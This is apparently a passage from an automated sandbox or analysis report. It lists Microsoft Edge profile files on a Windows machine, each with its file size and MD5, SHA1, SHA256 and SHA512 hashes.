                                                                                                                                                                                  MD5

                                                                                                                                                                                  ba5cb38044e26107ff8f95f86af7c6f9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f5d9e344d0724f2d9513238fd0d6c583553a85ce

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4a81b129416a4c0e37755576316d17463b3947717fdb23b99a16ae59fcb63844

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  72819aba45ab1b0af008a248d522311dbc0ac13d54d36c854d8b75c7a9b96b8446e55582c4b28f726264912bd99e40d4e88636a7cfbc17ecd506ca292da74df4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  36KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3188dbfc81aacfdf603691044cad56dc

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7fe710f5323a811e696b87e776a093f02a84ad0d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  57cde2f3359f9f203e8e27a281def58a986cef57ef4ad7857078945a6c0a003a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9fa83d10e189bd9714111e6bd6cdbc17fe1e2ba4f6b48a8f7c1609059360af492ba5d8208d2039588ba04f4649bc35edbfb0a6a3c34edd189600301eea386130

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  24KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  135c9b3f6f7481b161c5f38e828d1209

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7123cfcbf29524e96bf536d5c33306c7d33c2e82

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  736b33608a6f7a6bfe8bab8667ad8a05a590b7697c3ab370af4ae827f153c368

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  1938a79d4672fd96108763a8087e15e6678da8563a6e6b9a0f6e10224df1c0dde1a747097bc94f5f333e765d92caabe5abacae2f8fbe56526304ff4855afb8a1

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  24KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1d1c7c7f0b54eb8ba4177f9e91af9dce

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  2b0f0ceb9a374fec8258679c2a039fbce4aff396

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  555c13933eae4e0b0e992713ed8118e2980442f89fbdfb06d3914b607edbbb18

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4c8930fe2c805c54c0076408aba3fbfb08c24566fba9f6a409b5b1308d39c7b26c96717d43223632f1f71d2e9e68a01b43a60031be8f1ca7a541fe0f56f4d9f2

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  137B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a62d3a19ae8455b16223d3ead5300936

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c0c3083c7f5f7a6b41f440244a8226f96b300343

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c72428d5b415719c73b6a102e60aaa6ad94bdc9273ca9950e637a91b3106514e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f3fc16fc45c8559c34ceba61739edd3facbbf25d114fecc57f61ec31072b233245fabae042cf6276e61c76e938e0826a0a17ae95710cfb21c2da13e18edbf99f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  319B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bc108fcd50251119877ba9b54eebc84d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  61391bbdf1b8e2b1ee991d2c2b2babc82c5cc896

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7a870443bd2435e9aaf3c145270821d74f9f4b5c20903742a8aad0272d81a0ed

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  130aba946c828d405f109169a08dab530581fc43c913f77f8e50608b7e3ef71699ecf32466e6991900de8c50e3e695a11868f2df556bbc0055e79e9df5c3de04

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13352156908389134

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  9KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  93a2bb3ca21f6a4a8319f071ba75e56f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  035deeb79ff98903fd0aebabddcb23fb620e5101

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f35e1b02110f56ac01d30189de6646029f8bcbc85ac78d9e0397fcf4dcbbc701

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5e2ad2f0e26fadc4ed602c7adc3ae6e6c9a9e292b410454f1254e8fbde1afd2b3922a1269745b2553d65e1079403af055d9aba62d5b675f874404a63309af7ec

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13352156908641134

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6c602250497702a8749d39e21f1b8965

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cd7b18d52cba79c5c405346aab3ee4a374a91239

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  fa1aa0f97e893bad9a7f179a7e07ff4d0a4f715789463a26ce931cfa3290e285

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f4787f309a6e346ef9d0d216c7103b2fe81ade98bbc54ae327c474bbb75533b6239e284dedcba0034b7b8998ce2f8dc87399eeb52b53d96d70ab6976ad514c21

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  184B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  cc6dc943309737793953f7bd19479ee1

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a8974bcf5c06f2eeddea9f83f0fad7a6448ba2ce

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  07b79d39555d420111a8267603a37776b0766b3f4eec6b79a105084645f6fae3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  024c262c5095fa016e6ff8382eb1a0cc59dbf0c5753d37cd66d750249b30808aeb48c78a947723f9920a6b896fd06ba049da3176b6442a27beca508c55c7399a

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  347B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1960de20b1fd7ada63b32704ea613951

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8a49fc2df9738b559786e00d2286b854def76551

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f748ed5e7207bcf25b1fc836fc1705bf442e0ec91ae41a36518c4a0133eaf511

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b4e7aefe49a5e476335e81d57ae8653f00454aa7532ed650cb8f84ea835d60815dfb6093aabe0de52769cc3b2ed1924912de5b561f9d1d977b4ff0dc4b27760d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  326B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f25de9b06c5a1dd607f89d7dc7018293

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  9ca67eb5f33bd589bc1924959365bed5ea140890

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  66624663df1e8e4bad5990ca77600a22722c85e70ff666ce03b33c31364ba51c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  ce4a9e730a0aac7d1657d91bdf328b73f23f546b4f649a86aaea08e7ac3b1aa65204b2f53836343790c0fe8fa855312224592aac71b50e24c19da0d2b58034ec

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  27efd5f0b200106ef7b51fc5d98339f2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  543f76c0e747e5093a5d5d249d285be242884fe7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  eabb0088a447342f3e2a285593b7eabe0b77717bca5fc8548890dd2997024fed

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e29728590443bfc3043223e5a2aa8be5d6e01cbe83c480adfd065f617881ac9219607883c753019ca2c4d2e17c7662a58f9318dda878dc56b2dd1fce6d844823

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  8747c1817f676bf3eeb4a91b9ecaf73d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f9a8a08972796fd0c342ab6b20f6aae55b1503ab

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c282f54b12615ce5cc67fe59f1603da00caf656e397f63a4e29f8e07b017671f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7348f937ba5db45a4e43d2753a2791a13baaa9a6e848d809eb34761bee12bcdb32a7071c7f89c6f240ca22401707a4e9daed776534e30099e01c04cf54517718

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  277307033cff35a899447778d58701a6

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6cbe9a588bf07eddfa0c1351d8564a1103e9cfba

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1d7f9dbdb2d0137eeae15fb60115e76eb48b979bc7e71752766bf1c7300b94f6

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  03ec9cdec504bc78ab2d48a95d4fad4a56f6dfab7199d5afedf1795e836c9d2a545d6bef0fd9f2d19b1e84df71e539394dba27632b1aaa84abf87cebc8b6a54c

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  9d140f82289d248518902a82e4da9840

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f401be075a8af99950c11e4c92924c583e3644ac

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  910fe0e3c8533848bf82a1426a952c03be0e10045369f4f61b73a8cbe6b5a0dc

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  15953dfeb7a582f722d6f2ddf927ab4951668306919c0e51b5d0f4d901fc9c3bf57aac5792230ca53f3513ffe5a020f19477b012297d19c27d064c034403828c

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ebcd4b99198c1145ced7b70ca3abc1df

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6a9262be9d765b68d4a117225f22e968d8852c29

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7f466017e7787c96d535323359e608d3c3e003ad392d1cf1fdd63ec01b60ce16

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5c87398f1b9aff80eb0871bca144dcb84e6ae2c730c0a9704d60d91d6d78fba15e24794606658b7977c704bcc14682cdf9ea4cd9a779dc46880b06dbcb311551

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  0a0cbeaf6f11b3f23b96e019bc858c2c

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8c1eb8ddb722ee8db64569bfe7aaf0c174783b0b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  10abf5301b065070f158a9ef5271ead3bf7cff7462b412c3c9dc6dd119b6bd21

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0e2e8d61120d6dce544d5ffad795ff2a753b5786de94086ea90b923b6d43fbb0da7e7017a1efedf46c7418699d839449bd7f9b69f2571b8c8ea35d9145bf0dee

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b01fab62d0e2bcb6a85fa734988df3de

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4e128712912a5a69d4564149fa058628489b70a4

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4eac37a8e2c32ec003442fdbad04e9f82a2d69f377a316343015495483f606b5

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  41b7fdc3aea603a08d91a94dbddfb8b4a9b106e65dccf4a6886152ee3356d21dfec52d8cdceb693cffa0bccfe37975eab4288b33fb2d0a577c31f4f764017294

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3359a15e427391ea6f14711506da744f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a8155e19abbf61a7a83d43361c2424386be5c8d8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c47c5337df3387e74b3006ac7ac15bdcb252e0680a4ef7de4c0ff9debbaada5c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d4df3a723844091a765fa531f5dd837c3bba23a3c48f4e5db9b1a421e7a0a5c4b76e9140108ebc1c3e908e0efd889c7bef5ffe682eb0a665d79ac57022066714

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  18a872e5993c9b06d3d05728413958c9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1836b3f842a75560c4fc8b502ce64daf0cb31b4c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5f3920bc7ec89e263a20981bf611c7a35c13ac47806ceb7964cb9babb325bb26

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  14b86304bae07b75360376c5166d6c083222a9ceb6761574e8995d2b17bb2c83f55c9c36353cbb1f25bfeef7d746dc513629a3c14899514cb201e2588b8425bf

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b702272ab3c6d038a7dd93e7fc664dd8

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  453667164753190a6b3607435b40681eb9c4799a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  34bca0613a9c695e4a4c606d31dd528d9b70f4fde58147f6122eed37ded5f1f1

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  aee41e503c0f709db9731840010c307c852943e0a437767927cfd2023ed32aa32f187c8c945c3066a03016dc00cc5a1179807bf781de34df9599d41d38edc99b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe597361.TMP

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  538B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1be3c71e80f298525d38f33a1eb299e5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cc3a63421c3ce3d866bdfc852f78e92fada31a2a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e4fd889fcad6138e8ed5eb879c2b27c0c974ea197ee75aa81ea1686317c034a0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  6d1cbf7ccd73f226cb62be9f9438d5f20e335db073f4b3f8eb165db801cb484d4c7d826fc093f4b6e012cab80ead94d6d529f0663f745b49480ba0aed246323e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  128KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d50bd9c8287e0868cfe5e20606e01164

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e16235ed669a2af083742c720350dcec16777ffb

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  46186bbe5a573b983580d8cf6ff737775f7084af9b8bccba3f3a5fdb08204231

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5abb07adaf048e1aa7c470ec53267734f50d33496330efb56edd9a675d050eb6fc9c4ef90b294abedfdba184530b37d8d92ff280e5913d1035f0f2df6a359944

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  116KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  71c6f6cdd40cec191b3f993f3d7608e5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ba9e7e81ada886faa83468dc4bff929ec4bb831c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8079d677963b3e8f0e84ed8da5522e954c11a1e07776d0d52aad9403df44803c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9a3109be5dfab460b5305c49a0cd6ad46bf28a647ade55c6797e421d024f5cf73283c9072a4da8acab9e7db555592101a741b3d863dc809c55bbc77cc64d4ce0

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  0a3c6d22b18b9d113200ce4ec09bc0d7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6149416d2de42f2eb4161dfe25e65cb887654de8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  02cdff187f899ad8b4ddd2523ed99be3d05ca78e428ab348ec7db99c8bc05f73

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  240752dcbe52c2e45395d424dcbcc47498652e984e51e4a829b1cf9c19cb8092f9bed95ee1411a071bb543d66f2eb1bf971ad72c2990f6ffb01e30dd48014de8

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  aefd77f47fb84fae5ea194496b44c67a

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  dcfbb6a5b8d05662c4858664f81693bb7f803b82

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  589c49f8a8e18ec6998a7a30b4958ebc

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  60e3f691077715586b918375dd23c6b0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  476d3eab15649c40c6aebfb6ac2366db50283d1b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  44KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  74d57d8563cb1354c518222a56f7e964

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3b2212e4b2ab42659322083042320d260fbde228

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  789c0197ba4c0650c59e6ab4bedcc338854dd0193a0aebf771e86b02bc1d4bda

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d43f4b300095db8993ad33f7dba347d786e9e8e909ca3cbe8dd74f44a4dcf9e99176c2437e808b76fe9948179dfef5e936351174843cc0312f4183b8a2916c1c

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  206B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  120fd93495ab948f4529f30335ca3c11

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ff2397ac0148c7fd04a101e9ee8f451526cfecd1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c52ee3912090a5cd53e533e65b8f439f55aef1faecde4b4e683e04fa5d1ba038

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  be4cb24515f74016ee9d1faae9d1760240ca4fdbb5bb14519fef245195ba87a00c5f28836c415b3475ce349d9107d7d6f0fc481eb2e7a56e9c9cb498a915a279

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  319B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4831ba79145be64e3ea61978c828896d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  2d2cdc1d72e61e90f9f993e193ae9dccc30c8ccf

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7471e9cc6e8aa74565a01a2c178d654b78782d4a56cc663a16fe935fc0ddee4f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  349be55697108fdb95042ba4096764aa29c4fdbb56df3b4724003ab6193559615c6caabaf219fe85b8100e998ce1613a93d01e6cbb23eee1ff431f9ee9299b0f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  565B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b557e029d4d4bb00a1064672b33e7237

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  36e576359092d828d441ca095674688866cec333

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  9695955c7c3413afe290e6a70f38d5c054fb07837b36a72a4d772235c9caa6a5

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  058a492acd23d8a56d8109ef23370da992ce923053632fb18f61b1ae45276a1328f8eddf01c7c4de99d5c78416720fd6d2228041eb57d76edc1314c6952c2a26

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  337B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  13194740130b04de6627edcdac285086

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8dfc1ec8bbb123c4b64fae5fb4454d8d816e950c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a6ecef2fb8d35989eb119c8df75529bf361a1adb891b53d6a3bf1c5a1d186b5d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7e0d115b51ada03c2490d34b725becd5c150ce1c76d78a6b9f4dd16c429971aebdb32ed4524656ecf283516e628cf57e880eb36a634e7dbe4d89291d8fc8005b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  44KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7c01ad3270029d112acb1fa555344d4c

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7531c4c1d5b20a78d8c633d87b631095b8f6cbb0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c58b427ac3c90a1f6e246942b18ddd86c18703e0b4f34da51fcbc3177d2695f1

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  aab88e7a5aeb875206956b77e55608e1bd1a979dad237fe3219ec31d5104302708090f92824aa471f4e29c6ee79b145b14682952562eca94aca75cea9442d756

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  264KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6613f8fb9bd89f672fed1c05029a7246

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  47e647ac4e8ca1d2c0a72ba8eb3dca135ea31d19

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c87ed4f49f64dbcbb67c649205e96e15036b1a28192a9b80d56c0c8e3b66693d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4b4d3ee35f79b637df95fe5634a41c7081438192e24838d4aae4833fb7a2a59abaf190dab70f67fd16ce29c13f1d689b5fff7de7aded5f67d5ddbc43fdd3e172

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4.0MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  9525131d2f4b2193033c93604b655564

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3002ad3907e7ff0f392819f0128d803cd4d74439

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  264a67851df0a96b226f3121999e0a15af5be3be9a29e44c72dea366ddf4fe60

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  489a9a2b97153934c47a1048600705888ff2695c425ed396dbae00fb42eb90ffe2d70943cdd1d83bf15663b4707e3a82de566b6667d41bd39dba1cac8a71eccb

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  22KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1ac9e744574f723e217fb139ef1e86a9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4194dce485bd10f2a030d2499da5c796dd12630f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4564be03e04002c5f6eaeaea0aff16c5d0bbdad45359aef64f4c199cda8b195e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b8515fb4b9470a7ce678331bbd59f44da47b627f87ea5a30d92ec1c6d583f1607539cd9318a5bccf0a0c6c2bd2637992e0519bd37acdf876f7a11ed184fb5109

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  17KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  913728da90cf90d8e78af59c60b47c3d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f42f2a545d4fcaf4f76d0f060f52e33a47df7f1e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b0b478f9aa6aaf8d5811e296047ae1f8ee07f4c4998fe9d7b960755ea1fafb82

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3af86e053dd56aef03e6f967a49b1a0d492616a71e2e49090e0c8e5cbe58ff37ccc55e91f06bf34096059a49f3de84b0bca587f3f17c366f97c0f7a0fd17c974

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  11B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  838a7b32aefb618130392bc7d006aa2e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5159e0f18c9e68f0e75e2239875aa994847b8290

